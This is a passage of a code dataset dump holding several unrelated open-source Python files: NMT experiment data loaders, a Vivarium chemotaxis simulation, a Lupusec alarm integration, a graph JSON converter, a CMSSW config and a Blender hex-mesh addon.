split_ratio=split_ratio)\n train_data = GenerativeBatchIterable(\n file_creator=file_creator, batches=steps, batch_size=batch_size, field=self.tgt_vocab,\n dynamic_epoch=dynamic_epoch, batch_first=batch_first, shuffle=shuffle, sort_by=sort_by,\n **self._get_batch_args())\n else:\n data = BatchIterable(\n data_path=data_path, batch_size=batch_size, field=self.tgt_vocab, sort_by=sort_by,\n batch_first=batch_first, shuffle=shuffle, **self._get_batch_args())\n train_data = LoopingIterable(data, steps)\n\n return train_data\n\n\n def file_creator(self, train_file, split_ratio, *args, **kwargs):\n self._pre_process_parallel(*args, src_key='train_src', tgt_key='train_tgt',\n out_file=train_file, split_ratio=split_ratio, **kwargs)\n return train_file\n\n def get_val_data(self, batch_size: Union[int, Tuple[int,int]], sort_desc=False, batch_first=True,\n shuffle=False):\n raw_path = None\n prep = self.config.get('prep', {})\n if 'valid_src' in prep and 'valid_tgt' in prep:\n raw_path = prep['valid_src'], prep['valid_tgt']\n\n return BatchIterable(self.valid_file, batch_size=batch_size, sort_desc=sort_desc,\n batch_first=batch_first, shuffle=shuffle, field=self.tgt_vocab,\n keep_in_mem=True, raw_path=raw_path, **self._get_batch_args())\n\n def get_combo_data(self, batch_size: int, steps: int = 0, sort_desc=False, batch_first=True,\n shuffle=False):\n if not self.combo_file.exists():\n # user may have added fine tune file later\n self._pre_process_parallel('combo_src', 'combo_tgt', self.combo_file)\n combo_file = IO.maybe_tmpfs(self.combo_file)\n data = BatchIterable(\n combo_file, batch_size=batch_size, sort_desc=sort_desc, field=self.tgt_vocab,\n batch_first=batch_first, shuffle=shuffle, **self._get_batch_args()\n )\n if steps > 0:\n data = LoopingIterable(data, steps)\n return data\n\n def reload(self):\n exp = type(self)(self.work_dir, read_only=self.read_only)\n self.__dict__ = exp.__dict__\n\n def copy_vocabs(self, other):\n \"\"\"\n Copies vocabulary files from self to other\n :param other: other experiment\n :return:\n \"\"\"\n other: TranslationExperiment = other\n if not other.data_dir.exists():\n other.data_dir.mkdir(parents=True)\n for source, destination in [(self._src_field_file, other._src_field_file),\n (self._tgt_field_file, other._tgt_field_file),\n (self._shared_field_file, other._shared_field_file)]:\n if source.exists():\n IO.copy_file(source.resolve(), destination.resolve())\n src_txt_file = source.with_name(source.name.replace('.model', '.vocab'))\n if src_txt_file.exists():\n dst_txt_file = destination.with_name(\n destination.name.replace('.model', '.vocab'))\n IO.copy_file(src_txt_file, dst_txt_file)\n\n def get_mono_data(self, split: str, side: str, batch_size: int, sort_desc: bool = False,\n batch_first: bool = False, shuffle: bool = False, num_batches: int = 0):\n \"\"\"\n reads monolingual data\n :param split: name of the split. choices = {train, valid}\n :param side: which side ? choices = {src, tgt}\n :param batch_size: what should be batch size. example =64\n :param sort_desc: should the seqs in batch be sorted descending order of length ?\n :param batch_first: should the first dimension be batch instead of time step ?\n :param shuffle: should the seqs be shuffled before reading (and for each re-reading\n if num_batches is too large)\n :param num_batches: how many batches to read?\n :return: iterator of batches\n \"\"\"\n assert side in ('src', 'tgt')\n assert split in ('train', 'valid')\n inp_file = {\n ('train', 'src'): self.mono_train_src,\n ('train', 'tgt'): self.mono_train_tgt,\n ('valid', 'src'): self.mono_valid_src,\n ('valid', 'tgt'): self.mono_valid_tgt,\n }[(split, side)]\n assert inp_file.exists()\n # read this file\n field = self.tgt_vocab if side == 'tgt' else self.src_field\n data = BatchIterable(inp_file, batch_size=batch_size, sort_desc=sort_desc,\n batch_first=batch_first, shuffle=shuffle, field=field,\n **self._get_batch_args())\n\n if num_batches > 0:\n data = LoopingIterable(data, num_batches)\n return data\n","sub_path":"rtg/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":41856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15438667","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport sys\nimport uuid\nimport argparse\nimport copy\n\nfrom vivarium.core.emitter import timeseries_from_data\nfrom vivarium.library.dict_utils import deep_merge\nfrom vivarium.core.experiment import (\n generate_state,\n Experiment\n)\nfrom vivarium.core.composition import (\n agent_environment_experiment,\n make_agents,\n simulate_experiment,\n plot_agents_multigen,\n process_in_compartment,\n EXPERIMENT_OUT_DIR,\n)\n\n# compartments\nfrom vivarium.compartments.static_lattice import StaticLattice\nfrom vivarium.compartments.chemotaxis_minimal import ChemotaxisMinimal\nfrom vivarium.compartments.chemotaxis_master import ChemotaxisMaster\nfrom vivarium.compartments.chemotaxis_flagella import (\n ChemotaxisVariableFlagella,\n ChemotaxisExpressionFlagella\n)\n\n# processes\nfrom vivarium.processes.Vladimirov2008_motor import MotorActivity\nfrom vivarium.processes.multibody_physics import agent_body_config\nfrom vivarium.plots.multibody_physics import (\n plot_temporal_trajectory,\n plot_agent_trajectory,\n plot_motility,\n)\nfrom vivarium.processes.static_field import make_field\n\n\n# make an agent from a lone MotorActivity process\nMotorActivityAgent = process_in_compartment(\n MotorActivity,\n paths={\n 'external': ('boundary',),\n 'internal': ('cell',)\n })\n\n\nDEFAULT_BOUNDS = [1000, 5000]\nDEFAULT_AGENT_LOCATION = [0.5, 0.1]\nDEFAULT_LIGAND_ID = 'MeAsp'\nDEFAULT_INITIAL_LIGAND = 25.0\nDEFAULT_ENVIRONMENT_TYPE = StaticLattice\n\n\ndef get_environment_config():\n # field parameters\n field_scale = 1.0\n exponential_base = 2e2\n field_center = [0.5, 0.0]\n\n # multibody process config\n multibody_config = {\n 'animate': False,\n 'jitter_force': 5e-4,\n 'bounds': DEFAULT_BOUNDS}\n\n # static field config\n field_config = {\n 'molecules': [DEFAULT_LIGAND_ID],\n 'gradient': {\n 'type': 'exponential',\n 'molecules': {\n DEFAULT_LIGAND_ID: {\n 'center': field_center,\n 'scale': field_scale,\n 'base': exponential_base}}},\n 'bounds': DEFAULT_BOUNDS}\n\n return {\n 'multibody': multibody_config,\n 'field': field_config}\n\nDEFAULT_ENVIRONMENT_CONFIG = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config()\n}\n\nDEFAULT_AGENT_CONFIG = {\n 'ligand_id': DEFAULT_LIGAND_ID,\n 'initial_ligand': DEFAULT_INITIAL_LIGAND,\n 'external_path': ('global',),\n 'agents_path': ('..', '..', 'agents')\n}\n\n\n# run the simulation\ndef run_chemotaxis_experiment(\n agents_config=None,\n environment_config=None,\n initial_state=None,\n simulation_settings=None,\n experiment_settings=None):\n\n if not initial_state:\n initial_state = {}\n if not experiment_settings:\n experiment_settings = {}\n\n total_time = simulation_settings['total_time']\n emit_step = simulation_settings['emit_step']\n\n # agents ids\n agent_ids = []\n for config in agents_config:\n number = config['number']\n if 'name' in config:\n name = config['name']\n if number > 1:\n new_agent_ids = [name + '_' + str(num) for num in range(number)]\n else:\n new_agent_ids = [name]\n else:\n new_agent_ids = [str(uuid.uuid1()) for num in range(number)]\n config['ids'] = new_agent_ids\n agent_ids.extend(new_agent_ids)\n\n initial_agent_body = agent_body_config({\n 'bounds': DEFAULT_BOUNDS,\n 'agent_ids': agent_ids,\n 'location': DEFAULT_AGENT_LOCATION})\n initial_state.update(initial_agent_body)\n\n # make the experiment\n experiment = agent_environment_experiment(\n agents_config,\n environment_config,\n initial_state,\n experiment_settings)\n\n # simulate\n settings = {\n 'total_time': total_time,\n 'emit_step': emit_step,\n 'return_raw_data': True}\n return simulate_experiment(experiment, settings)\n\n\ndef run_mixed(out_dir='out'):\n total_time = 720\n emit_step = 0.1\n\n # configure\n agents_config = [\n {\n 'type': ChemotaxisMinimal,\n 'name': 'motor_receptor',\n 'number': 1,\n 'config': DEFAULT_AGENT_CONFIG\n },\n {\n 'type': MotorActivityAgent,\n 'name': 'motor',\n 'number': 1,\n 'config': DEFAULT_AGENT_CONFIG\n }\n ]\n\n environment_config = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config()\n }\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step\n }\n\n # simulate\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=environment_config,\n simulation_settings=simulation_settings,\n )\n\n # plot\n field_config = environment_config['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef run_variable(out_dir='out'):\n total_time = 720\n emit_step = 0.1\n\n flagella_numbers = [0, 3, 6, 9, 12]\n\n baseline_agent_config = {\n 'number': 1,\n 'type': ChemotaxisVariableFlagella,\n 'config': DEFAULT_AGENT_CONFIG\n }\n\n # configure\n agents_config = []\n for n_flagella in flagella_numbers:\n agent_config = copy.deepcopy(baseline_agent_config)\n agent_config['name'] = '{}_flagella'.format(n_flagella)\n agent_config['config'].update({'n_flagella': n_flagella})\n agents_config.append(agent_config)\n\n environment_config = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config()}\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step}\n\n # simulate\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=environment_config,\n simulation_settings=simulation_settings,\n )\n\n # plot\n field_config = environment_config['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef run_minimal(out_dir='out'):\n total_time = 30\n emit_step = 0.1\n\n # configure\n agents_config = [\n {\n 'number': 6,\n 'name': 'minimal',\n 'type': ChemotaxisMinimal,\n 'config': DEFAULT_AGENT_CONFIG,\n }\n ]\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step}\n\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=DEFAULT_ENVIRONMENT_CONFIG,\n simulation_settings=simulation_settings\n )\n\n # plot\n field_config = DEFAULT_ENVIRONMENT_CONFIG['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef run_master(out_dir='out'):\n # TODO -- master requires environment for metabolism external\n\n agent_type = ChemotaxisMaster\n total_time = 30\n emit_step = 0.1\n\n # configure\n agents_config = [\n {\n 'number': 1,\n 'name': 'master',\n 'type': agent_type,\n 'config': DEFAULT_AGENT_CONFIG\n }\n ]\n\n environment_config = {\n 'type': DEFAULT_ENVIRONMENT_TYPE,\n 'config': get_environment_config(),\n }\n\n simulation_settings = {\n 'total_time': total_time,\n 'emit_step': emit_step,\n }\n\n # simulate\n data = run_chemotaxis_experiment(\n agents_config=agents_config,\n environment_config=environment_config,\n simulation_settings=simulation_settings,\n )\n\n # plot\n field_config = environment_config['config']['field']\n plot_chemotaxis_experiment(data, field_config, out_dir)\n\n\ndef plot_chemotaxis_experiment(\n data,\n field_config,\n out_dir):\n\n # multigen agents plot\n plot_settings = {\n 'agents_key': 'agents',\n 'max_rows': 30,\n 'skip_paths': [\n ('boundary', 'mass'),\n ('boundary', 'length'),\n ('boundary', 'width'),\n ('boundary', 'location'),\n ]}\n plot_agents_multigen(data, plot_settings, out_dir, 'agents')\n\n # trajectory and motility\n agents_timeseries = timeseries_from_data(data)\n field = make_field(field_config)\n trajectory_config = {\n 'bounds': field_config['bounds'],\n 'field': field,\n 'rotate_90': True}\n\n plot_temporal_trajectory(copy.deepcopy(agents_timeseries), trajectory_config, out_dir, 'temporal')\n plot_agent_trajectory(agents_timeseries, trajectory_config, out_dir, 'trajectory')\n try:\n plot_motility(agents_timeseries, out_dir, 'motility_analysis')\n except:\n print('plot_motility failed')\n\n\ndef make_dir(out_dir):\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n\nif __name__ == '__main__':\n out_dir = os.path.join(EXPERIMENT_OUT_DIR, 'chemotaxis')\n make_dir(out_dir)\n\n parser = argparse.ArgumentParser(description='multibody')\n parser.add_argument('--minimal', '-n', action='store_true', default=False)\n parser.add_argument('--master', '-m', action='store_true', default=False)\n parser.add_argument('--variable', '-v', action='store_true', default=False)\n parser.add_argument('--mixed', '-x', action='store_true', default=False)\n args = parser.parse_args()\n no_args = (len(sys.argv) == 1)\n\n if args.minimal or no_args:\n minimal_out_dir = os.path.join(out_dir, 'minimal')\n make_dir(minimal_out_dir)\n run_minimal(minimal_out_dir)\n elif args.master:\n master_out_dir = os.path.join(out_dir, 'master')\n make_dir(master_out_dir)\n run_master(master_out_dir)\n elif args.variable:\n variable_out_dir = os.path.join(out_dir, 'variable')\n make_dir(variable_out_dir)\n run_variable(variable_out_dir)\n elif args.mixed:\n mixed_out_dir = os.path.join(out_dir, 'mixed')\n make_dir(mixed_out_dir)\n run_mixed(mixed_out_dir)\n","sub_path":"vivarium/experiments/chemotaxis.py","file_name":"chemotaxis.py","file_ext":"py","file_size_in_byte":9998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391548095","text":"\"\"\"\nLupusec Area\n\"\"\"\n\nimport logging\n\nfrom lupupy.devices import Device\n\n_LOGGER = logging.getLogger(__name__)\n\nDISARM = 0\nARM = 1\nHOME1 = 2\nHOME2 = 3\nHOME3 = 4\n\n\nclass Area(Device):\n \"\"\"Class to represent the Lupusec alarm as a device.\"\"\"\n\n def refresh(self):\n \"\"\"Refresh the alarm device.\"\"\"\n for area in self._lupusec.fetch_panel():\n if area[\"id\"] == self.id:\n self._data = area\n break\n\n def set_home(self, level=1):\n \"\"\"Arm Lupusec to home mode.\"\"\"\n if level == 1:\n return self.__set_mode(HOME1)\n if level == 2:\n return self.__set_mode(HOME2)\n if level == 3:\n return self.__set_mode(HOME3)\n\n raise Exception(\"invalid level\")\n\n def set_armed(self):\n \"\"\"Arm Lupusec to armed mode.\"\"\"\n return self.__set_mode(ARM)\n\n def set_disarmed(self):\n \"\"\"Arm Lupusec to stay mode.\"\"\"\n return self.__set_mode(DISARM)\n\n def __set_mode(self, mode):\n \"\"\"Set Lupusec alarm mode.\"\"\"\n\n if mode not in [ARM, DISARM, HOME1, HOME2, HOME3]:\n return _LOGGER.warning(\"Invalid mode\")\n\n response = self._lupusec.set_mode(mode=mode, area=self.id)\n\n if response[\"result\"] != 1:\n _LOGGER.warning(\"Mode setting unsuccessful: %s\", response[\"message\"])\n return False\n\n self._data[\"mode\"] = r\"{AREA_MODE_%s}\" % mode\n _LOGGER.info(\"Mode set to: %s\", self.mode)\n\n return True\n\n @property\n def id(self): # pylint: disable=C0103\n \"\"\"The area id\"\"\"\n return self._data.get(\"id\")\n\n @property\n def name(self):\n \"\"\"The area name\"\"\"\n return \"Area {0}\".format(self.id)\n\n @property\n def mode(self):\n \"\"\"Get alarm mode.\"\"\"\n mode_str = self._data.get(\"mode\")\n\n if mode_str == \"{AREA_MODE_0}\":\n return DISARM\n if mode_str == \"{AREA_MODE_1}\":\n return ARM\n if mode_str == \"{AREA_MODE_2}\":\n return HOME1\n if mode_str == \"{AREA_MODE_3}\":\n return HOME2\n if mode_str == \"{AREA_MODE_4}\":\n return HOME3\n\n raise Exception(\"invalid mode: %s\" % mode_str)\n\n @property\n def is_disarmed(self):\n \"\"\"Is alarm in standby mode.\"\"\"\n return self.mode == DISARM\n\n @property\n def is_armed(self):\n \"\"\"Is alarm in away mode.\"\"\"\n return self.mode == ARM\n\n @property\n def is_home(self):\n \"\"\"Is alarm in home mode.\"\"\"\n return self.mode in [HOME1, HOME2, HOME3]\n\n @property\n def is_alarm_triggered(self):\n \"\"\"Is alarm in alarm triggered mode.\"\"\"\n return self.mode > 0 and int(self._data.get(\"alarm\")) == 1\n\n def __repr__(self):\n mode = (\n \"Disarmed\"\n if self.mode == DISARM\n else \"Armed\"\n if self.mode == ARM\n else \"Home 1\"\n if self.mode == HOME1\n else \"Home 2\"\n if self.mode == HOME2\n else \"Home 3\"\n if self.mode == HOME3\n else \"\"\n )\n\n alarm_triggered = \" [ALARM TRIGGERED!]\" if self.is_alarm_triggered else \"\"\n\n return \"Area {0}: {1}{2}\".format(self.id, mode, alarm_triggered)\n","sub_path":"lupupy/devices/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"551086001","text":"import json\n\ngraph = json.load(open(\"graph.json\"))\n\nnodes = graph['graph']['node']\nedges = graph['graph']['edge']\nhouses = {}\npeople = {}\n\nfor node in nodes:\n num = node['id']\n for data in node['data']:\n key = data['key']\n value = data['text']\n node[key] = value\n\n if key == 'house-birth' or key == 'house-marriage' or key == 'group':\n if value not in houses.keys():\n houses[value] = -1 # []\n if num not in people.keys():\n people[num] = {}\n # houses[value].append({'id': num, 'type': key})\n people[num][key] = value\n del node['data']\n\nfor casata in houses.keys():\n num = int(num)+1\n houses[casata] = num\n nodes.append({'id': str(num), 'name': casata})\nprint(str(houses))\nprint('--------------------------------')\nprint(str(people))\n\nfor edge in edges:\n if 'list' in str(type(edge['data'])):\n for data in edge['data']:\n key = data['key']\n value = data['text']\n edge[key] = value\n else:\n key = edge['data']['key']\n value = edge['data']['text']\n edge[key] = value\n del edge['data']\n\nfor edge in edges:\n if edge['relation'] == 'killed': # and edge[]\n edge['value'] = 40\n edge['stroke'] = '#c52507'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'mother' and edge['type'] == 'biological':\n edge['value'] = 4\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'father' and edge['type'] == 'biological':\n edge['value'] = 4\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'sibling' and edge['type'] == 'biological':\n edge['value'] = 8\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '5,5'\n if edge['relation'] == 'father' and edge['type'] == 'legal':\n edge['value'] = 8\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '20,10,5,5,5,10'\n if edge['relation'] == 'lover':\n edge['value'] = 16\n edge['stroke'] = '#913ccd'\n edge['stroke-dasharray'] = '10,10'\n if edge['relation'] == 'spouse':\n edge['value'] = 4\n edge['stroke'] = '#913ccd'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'dragon':\n edge['value'] = 8\n edge['stroke'] = '#5481e6'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'direwolf':\n edge['value'] = 8\n edge['stroke'] = '#5481e6'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'pledge':\n edge['value'] = 24\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '10,10'\n if edge['relation'] == 'allegiance' and edge['type'] == 'oath':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'kingsguard':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'queensquard':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'hand':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'ward':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\nfor person in people.keys():\n value = 1\n if 'group' in people[person].keys():\n edges.append({\"source\": person, \"target\": str(houses[people[person]['group']]), \"type\": 'group', \"value\": value, \"stroke\":'black', 'stroke-dasharray': '0'})\n value *= 2\n if 'house-marriage' in people[person].keys():\n edges.append({\"source\": person, \"target\": str(houses[people[person]['house-marriage']]), \"type\": 'house-marriage', \"value\": value,\"stroke\":'black', 'stroke-dasharray': '0'})\n value *= 4\n if 'house-birth' in people[person].keys():\n edges.append({\"source\": person, \"target\": str(houses[people[person]['house-birth']]), \"type\": 'house-birth', \"value\": value,\"stroke\":'black', 'stroke-dasharray': '0'})\n value *= 2\n\nto_save = {'node': nodes, 'edge': edges}\n\n\nwith open('data2.json', 'w') as out_file:\n json.dump(to_save, out_file, indent=4)\n\n","sub_path":"pythonscript/json_converter.py","file_name":"json_converter.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"573231990","text":"import os\n\n# Main function called from model2roms\ndef getFilename(confM2R,year,month,defaultvar):\n if confM2R.indatatype == 'SODA3':\n if defaultvar is None:defaultvar=\"salinity\"\n filenamein = getSODA3filename(confM2R, year, month, defaultvar)\n if confM2R.indatatype == 'GLORYS':\n if defaultvar is None:defaultvar=\"temperature\"\n filenamein = getGLORYSfilename(confM2R, year, month, defaultvar)\n return filenamein\n \n# private functions called from within module\ndef getGLORYSfilename(confM2R, year, month, myvar):\n filename = confM2R.modelpath + 'glorys.nc'\n\n return filename\n\n#def getSODA3filename(confM2R, year, month, myvar):\n if (myvar in ['cn', 'hi', 'hs']):\n return confM2R.modelpath + \"soda.nc\"\n else:\n return confM2R.modelpath + \"soda.nc\"","sub_path":"forcingFilenames.py","file_name":"forcingFilenames.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216292406","text":"import FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\nfrom FastTiming.RecoTreeUtils.RecoFastTiming_cfi import *\n\noptions = VarParsing('analysis')\n\noptions.register('sampleName',\n 'SingleGammaE50_noPU',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n \"sample to process\")\noptions.parseArguments()\n\n## Get I/O files from the list given the sample name\nfilesOpt = cms.PSet(\n inputFiles = cms.untracked.vstring(\"\"),\n outputFile = cms.string(\"\")\n)\n\nGetSampleFiles(options.sampleName, filesOpt)\n\n##------------------------------------------------------------------------------\n\nprocess = cms.Process(\"RecoFastTiming\")\n\n## load the SK geometry and magnetic field config\nprocess.load('Configuration.Geometry.GeometryExtended2023SHCalNoTaperReco_cff')\nprocess.load('Configuration.Geometry.GeometryExtended2023SHCalNoTaper_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')\nprocess.load('Configuration/EventContent/EventContent_cff')\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = filesOpt.inputFiles)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = filesOpt.outputFile)\n\nprocess.ft = cms.EDAnalyzer('RecoFastTiming')\n\nprocess.p = cms.Path(process.ft)\n","sub_path":"RecoTreeUtils/test/RecoFastTiming_cfg.py","file_name":"RecoFastTiming_cfg.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"477900088","text":"import re\nimport bpy\nimport bmesh\nimport mathutils\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nVector = mathutils.Vector\nMatrix = mathutils.Matrix\n\nbl_info = {\n \"name\": \"Frontier tools\",\n \"category\": \"Object\",\n}\n\ndef edgesMap(obj, vert_indices):\n vert_set = set(vert_indices)\n edges = []\n for e in obj.data.edges:\n if e.vertices[0] in vert_set and e.vertices[1] in vert_set:\n edges.append((e.vertices[0], e.vertices[1]))\n\n out = defaultdict(list)\n for a, b in edges:\n out[a].append(b)\n out[b].append(a)\n return out\n\ndef boundingBox(positions):\n# if len(positions) == 0:\n# return (Vector((0,0,0)), Vector((0, 0, 0)))\n\n vmin = positions[0].copy()\n vmax = positions[0].copy()\n for pos in positions:\n for i in range(0, 3):\n vmin[i] = min(vmin[i], pos[i])\n vmax[i] = max(vmax[i], pos[i])\n return (vmin, vmax)\n\ndef borderVerts(obj):\n bout = []\n cout = []\n bgroup_idx = obj.vertex_groups.find(\"borders\")\n cgroup_idx = obj.vertex_groups.find(\"corners\")\n for vertex in obj.data.vertices:\n for group in vertex.groups:\n if group.weight > 0:\n if group.group == bgroup_idx:\n bout.append(vertex.index)\n if group.group == cgroup_idx:\n cout.append(vertex.index)\n return (bout, cout)\n\ndef selectVerts(obj, verts):\n assert(bpy.context.active_object == obj)\n toggle_edit = not obj.data.is_editmode\n if toggle_edit:\n bpy.ops.object.editmode_toggle()\n bm = bmesh.from_edit_mesh(obj.data)\n bm.verts.ensure_lookup_table()\n vert_set = set(verts)\n for vert in bm.verts:\n vert.select = vert.index in vert_set\n for face in bm.faces:\n face.select = all(v.index in vert_set for v in face.verts)\n for edge in bm.edges:\n edge.select = all(v.index in vert_set for v in edge.verts)\n bmesh.update_edit_mesh(obj.data)\n if toggle_edit:\n bpy.ops.object.editmode_toggle()\n\ndef shortestPath(obj, v1, v2, edge_map):\n prev = [-1] * len(obj.data.vertices)\n visited = [False] * len(obj.data.vertices)\n\n queue = deque([v1])\n while len(queue) > 0:\n v = queue.popleft()\n if visited[v]:\n continue\n visited[v] = True\n if v == v2:\n break\n for ev in edge_map[v]:\n if prev[ev] == -1:\n prev[ev] = v\n queue.append(ev)\n \n edge = [v2]\n while edge[-1] != v1:\n v = prev[edge[-1]]\n assert(v != -1)\n edge.append(v)\n edge.reverse()\n \n return edge\n\nhex_directions = [ (1, 0), (0, 1), (-1, 1), (-1, 0), (0, -1), (1, -1) ]\nhex_width = 5.196152423 #sin(60 deg) * 6\nhex_height = 6.0\nhex_verts = [\n Vector(( hex_width / 2.0, -hex_height / 4.0, 0)),\n Vector(( hex_width / 2.0, hex_height / 4.0, 0)),\n Vector((0, hex_height / 2.0, 0)),\n Vector((-hex_width / 2.0, hex_height / 4.0, 0)),\n Vector((-hex_width / 2.0, -hex_height / 4.0, 0)),\n Vector((0, -hex_height / 2.0, 0))\n]\n\ndef hexVector(x, y):\n move_x = Vector((hex_width / 2.0, 0.0, 0))\n move_y = Vector((0, hex_height * 0.75, 0))\n vec = move_x * 2 * x + move_y * y + move_x * y\n return vec\n\ndef hexPos(vec):\n y = vec[1] / (hex_height * 0.75)\n x = (vec[0] - y * (hex_width / 2.0)) / hex_width\n return (math.trunc(x + (-0.5 if x < 0 else 0.5)),\n math.trunc(y + (-0.5 if y < 0 else 0.5)))\n\ndef whichHexDirection(pos1, pos2):\n diff = (pos2[0] - pos1[0], pos2[1] - pos1[1])\n for i in range(0, len(hex_directions)):\n if diff == hex_directions[i]:\n return i\n return -1\n\n# Generates a list of eges each starting and ending at a corner\n# iterating over evry border vertex between them\ndef hexEdges(obj, cverts, bedge_map):\n used_edges = set([])\n out = []\n\n for cv in cverts:\n for nv in bedge_map[cv]:\n if (cv, nv) in used_edges:\n continue\n edge = [cv, nv]\n used_edges.add((cv, nv))\n used_edges.add((nv, cv))\n\n while (edge[-1] not in cverts):\n pv = edge[-1]\n ev = -1\n for nv in bedge_map[pv]:\n if not (pv, nv) in used_edges:\n ev = nv\n break\n assert(ev != -1)\n edge.append(ev)\n used_edges.add((pv, ev))\n used_edges.add((ev, pv))\n\n assert(edge[0] in cverts and edge[-1] in cverts)\n out.append(edge)\n return out\n\nclass HexNode:\n verts = []\n bverts = []\n cverts = [] #they are ordered as hex directions\n edges = [] #each edge stores a list of verts from one corner to another\n # they are ordered as hex directions\n pos = (0, 0)\n\n def __init__(self, obj, verts, bverts, cverts):\n self.verts = verts\n self.bverts = bverts\n self.cverts = cverts.copy()\n assert(len(cverts) == 6)\n\n bedge_map = edgesMap(obj, bverts)\n edges = hexEdges(obj, cverts, bedge_map)\n assert(len(edges) == 6)\n overts = obj.data.vertices\n (vmin, vmax) = boundingBox([overts[vi].co for vi in verts])\n center = (vmin + vmax) * 0.5\n self.pos = hexPos(center + obj.location)\n\n # Making sure that edges create a loop\n ordered_edges = [edges[0]]\n edges.remove(edges[0])\n for i in range(1, 6):\n next_vert = ordered_edges[-1][-1]\n for e in edges:\n if e[0] == next_vert:\n ordered_edges.append(e)\n edges.remove(e)\n break\n elif e[-1] == next_vert:\n e.reverse()\n ordered_edges.append(e)\n edges.remove(e)\n break\n assert(len(ordered_edges) == 6)\n for i in range(0, 6):\n assert(ordered_edges[i][-1] == ordered_edges[(i + 1) % 6][0])\n assert(ordered_edges[0][0] == ordered_edges[-1][-1])\n\n # Making sure that edges are ordered as hex_directions\n first = -1\n first_x = vmin[0]\n for i in range(0, 6):\n iv = ordered_edges[i][0]\n x = (overts[ordered_edges[i][0]].co[0] + overts[ordered_edges[i][-1]].co[0]) * 0.5\n if first == -1 or x > first_x:\n first = i\n first_x = x\n left_slice = ordered_edges[0:first]\n right_slice = ordered_edges[first:]\n ordered_edges = right_slice + left_slice\n\n # Reversing whole loop if necessary\n if overts[ordered_edges[0][0]].co[1] > overts[ordered_edges[0][-1]].co[1]:\n ordered_edges.reverse()\n last = ordered_edges.pop(-1)\n ordered_edges.insert(0, last)\n for edge in ordered_edges:\n edge.reverse()\n\n self.edges = ordered_edges\n ordered_verts = []\n for i in range(0, 6):\n cverts[i] = self.edges[i][0]\n ordered_verts += self.edges[i]\n \n # Verifying that vertices are properly ordered\n for i in range(len(ordered_verts)):\n v1 = ordered_verts[i]\n v2 = ordered_verts[(i + 1) % len(ordered_verts)]\n assert(v1 == v2 or v2 in bedge_map[v1])\n\n\ndef hexNodes(obj, bverts, cverts, only_one=False):\n bvert_set = set(bverts)\n verts = obj.data.vertices\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n sel = [False] * len(verts)\n out = []\n\n for iv in range(0, len(verts)):\n node = []\n vis = [False] * len(verts)\n if sel[iv] or iv in bvert_set:\n continue\n neighs = [iv]\n while len(neighs) > 0:\n v = neighs.pop(-1)\n if sel[v]:\n continue\n if not vis[v]:\n node.append(v)\n vis[v] = True\n if not v in bvert_set:\n sel[v] = True\n neighs += edge_map[v]\n\n if len(node) > 0:\n nset = set(node)\n ncverts = []\n nbverts = []\n for cvert in cverts:\n if cvert in nset:\n 